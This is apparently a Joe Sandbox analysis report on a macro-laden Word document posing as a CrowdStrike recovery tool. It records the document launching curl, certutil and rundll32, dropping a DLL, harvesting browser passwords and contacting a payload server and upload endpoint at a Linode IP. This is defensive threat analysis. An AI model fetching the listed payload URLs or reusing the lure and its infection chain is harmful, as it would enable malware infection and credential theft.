behaviorgraph top1 signatures2 2 Behavior Graph ID: 1478411 Sample: New_Recovery_Tool_to_help_w... Startdate: 22/07/2024 Architecture: WINDOWS Score: 100 83 Multi AV Scanner detection for submitted file 2->83 85 Document contains VBA stomped code (only p-code) potentially bypassing AV detection 2->85 87 Machine Learning detection for dropped file 2->87 89 8 other signatures 2->89 10 WINWORD.EXE 162 473 2->10         started        13 WINWORD.EXE 2->13         started        16 chrome.exe 2->16         started        19 chrome.exe 2->19         started        process3 dnsIp4 91 Office process queries suspicious COM object (likely to drop second stage) 10->91 21 cmd.exe 1 10->21         started        63 C:\Users\user\AppData\Local\...\~WRC0000.tmp, Microsoft 13->63 dropped 23 cmd.exe 13->23         started        75 192.168.2.6, 443, 49703, 49714 unknown unknown 16->75 77 239.255.255.250 unknown Reserved 16->77 65 C:\...\MsftRecoveryToolForCSv2.zip (copy), Zip 16->65 dropped 25 chrome.exe 16->25         started        file5 signatures6 process7 dnsIp8 28 curl.exe 2 21->28         started        32 rundll32.exe 21->32         started        34 certutil.exe 2 21->34         started        42 4 other processes 21->42 36 rundll32.exe 23->36         started        38 conhost.exe 23->38         started        40 xcopy.exe 23->40         started        44 4 other processes 23->44 79 www.google.com 142.250.186.164 GOOGLEUS United States 25->79 process9 dnsIp10 81 172.104.160.126, 49717, 49724, 49725 LINODE-APLinodeLLCUS United States 28->81 67 C:\Users\user\AppData\Local\...\mscorsvc.txt, PEM 28->67 dropped 46 rundll32.exe 37 32->46         started        69 C:\Users\user\AppData\Local\Temp\curl.txt, PEM 34->69 dropped 49 rundll32.exe 36->49         started        71 C:\Users\user\AppData\Local\...\mscorsvc.dll, PE32+ 42->71 dropped 73 C:\Users\user\AppData\Local\Temp\curl.exe, PE32 42->73 dropped file11 process12 signatures13 93 Contains functionality to steal Chrome passwords or cookies 46->93 51 cmd.exe 1 46->51         started        95 System process connects to network (likely due to code injection or exploit) 49->95 97 Tries to harvest and steal browser information (history, passwords, etc) 49->97 53 cmd.exe 49->53         started        process14 process15 55 conhost.exe 51->55         started        57 taskkill.exe 51->57         started        59 conhost.exe 53->59         started        61 taskkill.exe 53->61         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm26%ReversingLabsScript-Macro.Downloader.Heuristic
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmp100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\curl.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\mscorsvc.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
https://www.ecosia.org/newtab/0%URL Reputationsafe
https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
http://172.104.160.126:8099/payload2.txt6ov0%Avira URL Cloudsafe
https://curl.se/libcurl/c/curl_easy_setopt.html0%Avira URL Cloudsafe
https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
http://172.104.160.126:80X990%Avira URL Cloudsafe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
http://172.104.160.126:80990%Avira URL Cloudsafe
https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
http://172.104.160.0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txt-oC:0%Avira URL Cloudsafe
https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
http://172.104.160.126:5000/Upl0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txton0%Avira URL Cloudsafe
https://curl.se/docs/sslcerts.html0%Avira URL Cloudsafe
http://172.104.160.126:5000/Uploadss0%Avira URL Cloudsafe
https://curl.se/docs/alt-svc.html#0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
https://curl.se/docs/sslcerts.htmlcurl0%Avira URL Cloudsafe
https://aka.ms/vs/17/release/vc_redist.x64.exe0%Avira URL Cloudsafe
https://curl.se/docs/copyright.htmlD0%Avira URL Cloudsafe
http://172.104.160.126:8099/pay0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html#0%Avira URL Cloudsafe
http://172.104.160.126:8099/pay00%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txtr0%Avira URL Cloudsafe
https://curl.se/docs/http-cookies.html#0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txt60%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txts0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txt0%Avira URL Cloudsafe
https://curl.se/P0%Avira URL Cloudsafe
http://172.104.160.126:8099/payload2.txto0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.186.164
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://172.104.160.126:5000/Uploadsstrue
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txttrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://duckduckgo.com/chrome_newtabV2ViIERhdGE=.16.drfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txt6ovcurl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/libcurl/c/curl_easy_setopt.htmlcurl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://duckduckgo.com/ac/?q=V2ViIERhdGE=.16.drfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099vbaProject.bintrue
    • Avira URL Cloud: safe
    unknown
    https://www.google.com/images/branding/product/ico/googleg_lodp.icoV2ViIERhdGE=.16.drfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/http-cookies.htmlcurl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:80X99vbaProject.binfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drtrue
    • Avira URL Cloud: safe
    unknown
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=V2ViIERhdGE=.16.drfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txt-oC:curl.exe, 0000000D.00000002.2189505676.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=V2ViIERhdGE=.16.drfalse
    • URL Reputation: safe
    unknown
    http://172.104.160.126:5000/Uplrundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520153129.0000020A783B3000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/alt-svc.htmlcertutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www.ecosia.org/newtab/V2ViIERhdGE=.16.drfalse
    • URL Reputation: safe
    unknown
    https://curl.se/docs/sslcerts.htmlcurl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/sslcerts.htmlcurlcurl.exefalse
    • Avira URL Cloud: safe
    unknown
    https://ac.ecosia.org/autocomplete?q=V2ViIERhdGE=.16.drfalse
    • URL Reputation: safe
    unknown
    https://curl.se/docs/hsts.htmlcurl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txtoncurl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://aka.ms/vs/17/release/vc_redist.x64.exedocument.xmlfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/alt-svc.html#rundll32.exefalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/copyright.htmlDxcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/paycurl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/hsts.html#curl.exefalse
    • Avira URL Cloud: safe
    unknown
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchV2ViIERhdGE=.16.drfalse
    • URL Reputation: safe
    unknown
    http://172.104.160.126:8099/payload2.txtrcurl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/pay0curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txtscurl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/Pxcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/http-cookies.html#curl.exefalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txt6curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=V2ViIERhdGE=.16.drfalse
    • URL Reputation: safe
    unknown
    http://172.104.160.126:8099/payload2.txtocurl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    239.255.255.250
    unknownReserved
    unknownunknownfalse
    172.104.160.126
    unknownUnited States
    63949LINODE-APLinodeLLCUStrue
    142.250.186.164
    www.google.comUnited States
    15169GOOGLEUSfalse
    IP
    192.168.2.6
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1478411
    Start date and time:2024-07-22 15:56:51 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 12m 59s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Run name:Potential for more IOCs and behavior
    Number of analysed new started processes analysed:40
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
    Detection:MAL
    Classification:mal100.troj.spyw.expl.evad.winDOCM@69/284@2/4
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 96%
    • Number of executed functions: 59
    • Number of non-executed functions: 260
    Cookbook Comments:
    • Found application associated with file extension: .docm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Browse link: https://go.microsoft.com/fwlink/?linkid=2280386
    • Scroll down
    • Close Viewer
    • Override analysis time to 240s for rundll32
    • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 184.28.90.27, 192.229.221.95, 52.111.243.40, 52.111.243.42, 52.111.243.41, 52.111.243.43, 199.232.214.172, 51.105.71.136, 52.109.28.47, 95.101.111.168, 95.101.111.179, 2.18.64.220, 2.18.64.224, 142.250.184.227, 142.250.185.206, 34.104.35.123, 74.125.71.84, 184.28.89.167, 23.212.89.111, 52.109.28.48, 20.189.173.2, 52.111.231.26, 52.111.231.25, 52.111.231.24, 52.111.231.23, 20.42.73.26
    • Excluded domains from analysis (whitelisted): osiprod-uks-bronze-azsc-000.uksouth.cloudapp.azure.com, odc.officeapps.live.com, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, a1847.dscg2.akamai.net, mobile.events.data.microsoft.com, e11290.dspg.akamaiedge.net, clients2.google.com, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, ocsp.digicert.com, login.live.com, download.microsoft.com.edgekey.net, e16604.g.akamaiedge.net, main.dl.ms.akadns.net, onedscolprdeus09.eastus.cloudapp.azure.com, officeclient.microsoft.com, download.microsoft.com, ukw-azsc-config.officeapps.live.com, ecs.office.com, fs.microsoft.com, onedscolprduks00.uksouth.cloudapp.azure.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, uks-azsc-000.odc.officeapps.live.com, nleditor.osi.office.net, uks-azsc-000.roaming.officeapps.live.com, edgedl.me.gvt1.com, s-0005.s-msedge.net, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, clients.l.google.com, eur
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size exceeded maximum capacity and may have missing network information.
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtDeviceIoControlFile calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtReadVirtualMemory calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • Report size getting too big, too many NtSetValueKey calls found.
    • VT rate limit hit for: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
    No simulations
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    239.255.255.250https://sites.google.com/view/sstransportinc/homeGet hashmaliciousHTMLPhisherBrowse
      https://nuasz.excaliburicon.com/?ccvoobkn=YWRhcHByb3ZhbHNAY29uZGVuYXN0LmNvbQ==Get hashmaliciousUnknownBrowse
        ATT96885.htmGet hashmaliciousHTMLPhisherBrowse
          https://liceultehnologicrosiajiu.ro/ulin/ulin8ce.htmlGet hashmaliciousCVE-2024-21412Browse
            lerpdf.45004.exeGet hashmaliciousUnknownBrowse
              https://trk.klclick3.com/ls/click?upn=u001.F5FUvNp8lGuVBrfF8VWSt-2Befrq4JwHZUrXxYUllvBu6JQLRTleNqoOq9cK2V6H9nF6TE8i5ai18ELwuaCRLRwA-3D-3DeBON_1svWsHF9QtKh6I35BSRfJziCtreSweSmmjNgxUuzWxLFgb12Ddkvv3gPW-2BY7HCV4BtwDYPCgqFm6ezf3LGkFgw-2FasXzQ01tiusM7qj7f7wQzyFpk04U-2BNsOiH-2B6C0IEGGhuBHlH4nFGk5hM1YrilA-2FklNstU7j1vcFJG8iHzTeSRYHOXIpK0cVyPDdeQeDUKiYrTYys-2FJ6BSjWfQuGIzI8V57VImtAPAAkrpuUD31VELoL-2FwLqoqcEcJaE-2B6fpm2wPTZkCul8wgxqc4qQClvNSQEUdlWOW-2BnsmWvhHzUvBgdPRhNpiRMg8ZZ-2BBQBoSFlRkufcGBk8zdT6H-2B-2FULHcbxzCKE71NmfbhvHZ7lmXl2A-3DGet hashmaliciousTycoon2FABrowse
                https://important-invite.ru/invitersvp/Get hashmaliciousHTMLPhisherBrowse
                  https://www.google.com.au/url?q=//www.google.co.nz/amp/s/clientdevelopmentserver.com/secure/documentattached.htmlGet hashmaliciousHTMLPhisherBrowse
                    Play__Now___Aud_for_matthew.whistler@holcim.com.htmlGet hashmaliciousUnknownBrowse
                      172.104.160.126mscorsvc.dllGet hashmaliciousUnknownBrowse
                      • 172.104.160.126:5000/Uploadss
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      LINODE-APLinodeLLCUSmscorsvc.dllGet hashmaliciousUnknownBrowse
                      • 172.104.160.126
                      SecuriteInfo.com.FileRepMalware.25505.20211.exeGet hashmaliciousUnknownBrowse
                      • 45.33.35.166
                      SecuriteInfo.com.FileRepMalware.25505.20211.exeGet hashmaliciousUnknownBrowse
                      • 45.79.94.110
                      92.249.48.47-skid.m68k-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                      • 172.104.247.254
                      ErieCustomerInvoiceReceipt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 104.200.25.225
                      z2WblTkkm2.exeGet hashmaliciousRemcosBrowse
                      • 173.255.204.62
                      https://u7161484.ct.sendgrid.net/ls/click?upn=u001.hSwgV93oKqJ8ZvQ-2F-2Bg69lRG3z5eH5AhV-2BJUjpvOnP47pFgt6vcHkzmMENxzqwp-2BRKeOD_zoLhCpkIy9Do8JtP-2BvPGbCKd-2BnnQhX22X7a9bdbWbCC5gFgFTIeDJ6cwijFzpwNISqmNkWsSGKxD-2FNSJjw0k1WplZHv6o0IxvsHmD61mU5ysV55-2B96DI72sCPsjm4NC818V0m0IM3im6ASY16u81LTenkvC-2FNvpnXD8McPjpGGauIb-2BM2U-2F5-2B1mP498QsMXa-2B6AhMNBfWHNfBJ5LHwc-2FEyMJR3z91eyiHhufIom4eLGOsOMu3-2Buvb1QWgf-2Fm28xUzJQB-2F0SFg3lJlq9Unc-2BGXVXdMHoo1zYap4ERXKPHz6fFTfg-2ByjNk2fx6gMZdF5wLdJ22iNNOIfJYnQmbrLKw8amK4pf2c0srhPNUjajemS3a0XAglQQfY-2FcnYJ8JCOteF8AXW7pHPGp1k6-2FUQvEbZwCojFrVmaSNpy4g9cIMi5Wb84VMjWDQkOvt1cLwqNYONTs-2FUB2VE3s9Hh05SQ7qgXlFKEeLNAjlDc8oLcdgcfk-3DGet hashmaliciousUnknownBrowse
                      • 66.228.46.212
                      nell.docGet hashmaliciousFormBookBrowse
                      • 45.79.104.7
                      mlk3kK6uLZ.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, VidarBrowse
                      • 139.162.238.184
                      Setup.exeGet hashmaliciousXmrigBrowse
                      • 172.104.165.191
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      1138de370e523e824bbca92d049a3777https://nuasz.excaliburicon.com/?ccvoobkn=YWRhcHByb3ZhbHNAY29uZGVuYXN0LmNvbQ==Get hashmaliciousUnknownBrowse
                      • 173.222.162.64
                      https://polr.netgroup.de/hKs-JSK99Get hashmaliciousPhisherBrowse
                      • 173.222.162.64
                      pharaoh.exeGet hashmaliciousUnknownBrowse
                      • 173.222.162.64
                      https://pub-b966847c89744b24a8575d383574ff51.r2.dev/index.html#dG9ueXJAZmlyc3Rncm91cC1zYS5jby56YQ==Get hashmaliciousHTMLPhisherBrowse
                      • 173.222.162.64
                      http://WWW.LIFTECH.CO.ZWGet hashmaliciousUnknownBrowse
                      • 173.222.162.64
                      https://email.owa-file-pdf.com/pdf-fileshare/#tunc.iper@digiturk.com.trGet hashmaliciousHTMLPhisherBrowse
                      • 173.222.162.64
                      http://jurgenusering.com/Get hashmaliciousUnknownBrowse
                      • 173.222.162.64
                      http://mbcxwo.comGet hashmaliciousUnknownBrowse
                      • 173.222.162.64
                      Clc-220199.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 173.222.162.64
                      file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                      • 173.222.162.64
                      28a2c9bd18a11de089ef85a160da29e4https://sites.google.com/view/sstransportinc/homeGet hashmaliciousHTMLPhisherBrowse
                      • 52.165.165.26
                      • 40.126.31.69
                      https://nuasz.excaliburicon.com/?ccvoobkn=YWRhcHByb3ZhbHNAY29uZGVuYXN0LmNvbQ==Get hashmaliciousUnknownBrowse
                      • 52.165.165.26
                      • 40.126.31.69
                      ATT96885.htmGet hashmaliciousHTMLPhisherBrowse
                      • 52.165.165.26
                      • 40.126.31.69
                      lerpdf.45004.exeGet hashmaliciousUnknownBrowse
                      • 52.165.165.26
                      • 40.126.31.69
                      https://important-invite.ru/invitersvp/Get hashmaliciousHTMLPhisherBrowse
                      • 52.165.165.26
                      • 40.126.31.69
                      Play__Now___Aud_for_matthew.whistler@holcim.com.htmlGet hashmaliciousUnknownBrowse
                      • 52.165.165.26
                      • 40.126.31.69
                      https://kwxciujqil.joseph-mathieu.workers.dev/?lneigvrscbp=Y25wZ2xhbW91ci1idXNpbmVzc0Bjb25kZW5hc3QuY29tGet hashmaliciousUnknownBrowse
                      • 52.165.165.26
                      • 40.126.31.69
                      https://t.co/J8cabPIhNaGet hashmaliciousUnknownBrowse
                      • 52.165.165.26
                      • 40.126.31.69
                      http://nys-ns.com/Get hashmaliciousUnknownBrowse
                      • 52.165.165.26
                      • 40.126.31.69
                      http://nys-ns.com/Get hashmaliciousUnknownBrowse
                      • 52.165.165.26
                      • 40.126.31.69
                      3b5074b1b5d032e5620f69f9f700ff0ehttps://nuasz.excaliburicon.com/?ccvoobkn=YWRhcHByb3ZhbHNAY29uZGVuYXN0LmNvbQ==Get hashmaliciousUnknownBrowse
                      • 40.113.103.199
                      25bbed456281ea6f37cb6b295ebd0d1764156e797b4f15e0dc1bbcd7342086a9_payload.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 40.113.103.199
                      New Order.exeGet hashmaliciousAgentTeslaBrowse
                      • 40.113.103.199
                      FileZilla_3.67.1_win64_sponsored-setup.exeGet hashmaliciousUnknownBrowse
                      • 40.113.103.199
                      FileZilla_3.67.1_win64_sponsored-setup.exeGet hashmaliciousUnknownBrowse
                      • 40.113.103.199
                      DRAFT DOCUMENTS.jsGet hashmaliciousAgentTeslaBrowse
                      • 40.113.103.199
                      http://beonlineboo.comGet hashmaliciousUnknownBrowse
                      • 40.113.103.199
                      Banco_BPM__Copia_del_Pagamento.pdf.batGet hashmaliciousRemcosBrowse
                      • 40.113.103.199
                      QvS0a5bvCMM8EUj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 40.113.103.199
                      DeqcE30sLb.exeGet hashmaliciousDCRatBrowse
                      • 40.113.103.199
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\curl.exehttps://rocksecuritymw.com/mus/?81367511Get hashmaliciousDarkGateBrowse
                        https://taskbes.com/ttse/?75486511Get hashmaliciousDarkGateBrowse
                          https://ledscreen.africa/dcil/?77391211Get hashmaliciousDarkGateBrowse
                            m7q7gcniEz.exeGet hashmaliciousUnknownBrowse
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):521377
                              Entropy (8bit):4.9084889265453135
                              Encrypted:false
                              SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                              MD5:C37972CBD8748E2CA6DA205839B16444
                              SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                              SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                              SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                              Malicious:false
                              Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                              Category:dropped
                              Size (bytes):773040
                              Entropy (8bit):6.55939673749297
                              Encrypted:false
                              SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                              MD5:4296A064B917926682E7EED650D4A745
                              SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                              SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
